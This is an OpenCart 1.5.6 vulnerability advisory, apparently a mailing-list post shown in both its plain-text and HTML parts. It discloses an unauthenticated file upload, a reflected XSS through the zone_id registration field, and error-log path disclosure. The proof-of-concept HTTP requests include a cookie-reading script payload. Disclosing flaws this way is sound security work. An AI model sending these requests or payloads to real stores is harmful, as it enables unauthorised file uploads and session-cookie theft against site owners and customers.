--479758653-844428858-1386184016=:70324
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable

###########################################################################=
=0A# Title: Opencart Multiple Vulnerabilities=0A# Vendor: http://www.openca=
rt.com=0A# Vulnerabilities: Arbitrary File Upload, XSS, Path Disclosure=0A#=
 Vulnerable Version: opencart 1.5.6 (prior versions also may be affected)=
=0A# Exploitation: Remote with browser=0A# Impact: High=0A# Vendor Supplied=
 Patch: N/A=0A# Original Advisory with Workaround: =0A# http://www.garda.ir=
/Opencart_Multiple_Vulnerabilities.html=0A#################################=
##########################################=0A=0A####################=0A- De=
scription:=0A####################=0A=0AQuote from vendor: OpenCart is a tur=
n-key ready "out of the box" shopping cart solution.=0AYou simply install, =
select your template, add products and you're ready to start accepting orde=
rs.=0A=0A=0A####################=0A- Vulnerability:=0A####################=
=0AIn the process of optimizing our crawler engine by garda.ir (garda.ir is=
 a Persian online shopping price comparison service which uses new search e=
ngine technologies to grab prices) we found file upload vulnerability in op=
encart application, further investigation lead us to discover other vulnera=
bilities such as path disclosure and xss.=0A=C2=A0=0A=0A=0A################=
####=0A- POC:=0A####################=0A=0A# 1=0A# File Upload=0A# Insuffici=
ent Authorization in /catalog/controller/product/product.php =0A# Result: t=
estupload.txt.somehash is created in /download folder=0A=0A=0APOST /opencar=
t-1.5.6/index.php?route=3Dproduct/product/upload HTTP/1.1=0AHost: example.c=
om=0AContent-Type: multipart/form-data; boundary=3D------------------------=
---4827543632391=0AContent-Length: 206=0AConnection: Keep-Alive=0A=0A=0A---=
--------------------------4827543632391=0AContent-Disposition: form-data; n=
ame=3D"file"; filename=3D"testupload.txt"=0AContent-Type: text/plain=0A=0At=
esttesttest=0A-----------------------------4827543632391--=0A=0A=0A# 2=0A# =
Reflected XSS and Path Disclosure=0A# Input Validation Error in /catalog/co=
ntroller/account/register.php=0A# Result: this will cause arbitrary scripti=
ng code to be executed by the=C2=A0=C2=A0=C2=A0=C2=A0=C2=A0=C2=A0 # target =
user's browser.=0A=0APOST /opencart-1.5.6/index.php?route=3Daccount/registe=
r HTTP/1.1=0AContent-Type: multipart/form-data; boundary=3D----------------=
-----------1e7a98bc645efbe7=0AContent-Length: 181=0AHost: example.com=0ACon=
nection: Keep-Alive=0A=0A=0A-----------------------------1e7a98bc645efbe7=
=0AContent-Disposition: form-data; name=3D"zone_id"=0A=0A12345'+alert(docum=
ent.cookie)+'=0A-----------------------------1e7a98bc645efbe7--=0A=0A=0A# 3=
=0A# Information Leakage =E2=80=93 Path Disclosure=0A# Insufficient Authori=
zation in /system/logs/error.txt =0A# Result: Information Disclosure=0A=0Ah=
ttp://www.example.com/opencart-1.5.6/system/logs/error.txt=0A=0A=0A########=
############=0A- Solution:=0A####################=0AThere is no Vendor Supp=
lied Patch at the time of this entry.=0AFor workaround check the Original A=
dvisory.=0A=0A=0A####################=0A- Credit:=0A####################=0A=
Discovered by: trueend5 (trueend5 [at] yahoo com)=0A=0AThis advisory is spo=
nsored by garda.ir=0Ahttp://www.garda.ir=0AA Persian online shopping price =
comparison service=0A
--479758653-844428858-1386184016=:70324
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: quoted-printable

<html><body><div style=3D"color:#000; background-color:#fff; font-family:He=
lveticaNeue, Helvetica Neue, Helvetica, Arial, Lucida Grande, sans-serif;fo=
nt-size:12pt"><div>########################################################=
###################<br># Title: Opencart Multiple Vulnerabilities<br># Vend=
or: http://www.opencart.com<br># Vulnerabilities: Arbitrary File Upload, XS=
S, Path Disclosure<br># Vulnerable Version: opencart 1.5.6 (prior versions =
also may be affected)<br># Exploitation: Remote with browser<br># Impact: H=
igh<br># Vendor Supplied Patch: N/A<br># Original Advisory with Workaround:=
 <br># http://www.garda.ir/Opencart_Multiple_Vulnerabilities.html<br>######=
#####################################################################<br><b=
r>####################<br>- Description:<br>####################<br><br>Quo=
te from vendor: OpenCart is a turn-key ready "out of the box" shopping cart=
 solution.<br>You simply install, select your template, add products
 and you're ready to start accepting orders.<br><br><br>###################=
#<br>- Vulnerability:<br>####################<br>In the process of optimizi=
ng our crawler engine by garda.ir (garda.ir is a Persian online shopping pr=
ice comparison service which uses new search engine technologies to grab pr=
ices) we found file upload vulnerability in opencart application, further i=
nvestigation lead us to discover other vulnerabilities such as path disclos=
ure and xss.<br>&nbsp;<br><br><br>####################<br>- POC:<br>#######=
#############<br><br># 1<br># File Upload<br># Insufficient Authorization i=
n /catalog/controller/product/product.php <br># Result: testupload.txt.some=
hash is created in /download folder<br><br><br>POST /opencart-1.5.6/index.p=
hp?route=3Dproduct/product/upload HTTP/1.1<br>Host: example.com<br>Content-=
Type: multipart/form-data; boundary=3D---------------------------4827543632=
391<br>Content-Length: 206<br>Connection:
 Keep-Alive<br><br><br>-----------------------------4827543632391<br>Conten=
t-Disposition: form-data; name=3D"file"; filename=3D"testupload.txt"<br>Con=
tent-Type: text/plain<br><br>testtesttest<br>-----------------------------4=
827543632391--<br><br><br># 2<br># Reflected XSS and Path Disclosure<br># I=
nput Validation Error in /catalog/controller/account/register.php<br># Resu=
lt: this will cause arbitrary scripting code to be executed by the&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp; # target user's browser.<br><br>POST /opencart-=
1.5.6/index.php?route=3Daccount/register HTTP/1.1<br>Content-Type: multipar=
t/form-data; boundary=3D---------------------------1e7a98bc645efbe7<br>Cont=
ent-Length: 181<br>Host: example.com<br>Connection: Keep-Alive<br><br><br>-=
----------------------------1e7a98bc645efbe7<br>Content-Disposition: form-d=
ata; name=3D"zone_id"<br><br>12345'+alert(document.cookie)+'<br>-----------=
------------------1e7a98bc645efbe7--<br><br><br># 3<br># Information Leakag=
e
 =E2=80=93 Path Disclosure<br># Insufficient Authorization in /system/logs/=
error.txt <br># Result: Information Disclosure<br><br>http://www.example.co=
m/opencart-1.5.6/system/logs/error.txt<br><br><br>####################<br>-=
 Solution:<br>####################<br>There is no Vendor Supplied Patch at =
the time of this entry.<br>For workaround check the Original Advisory.<br><=
br><br>####################<br>- Credit:<br>####################<br>Discove=
red by: trueend5 (trueend5 [at] yahoo com)<br><br>This advisory is sponsore=
d by garda.ir<br>http://www.garda.ir<br>A Persian online shopping price com=
parison service</div></div></body></html>
--479758653-844428858-1386184016=:70324--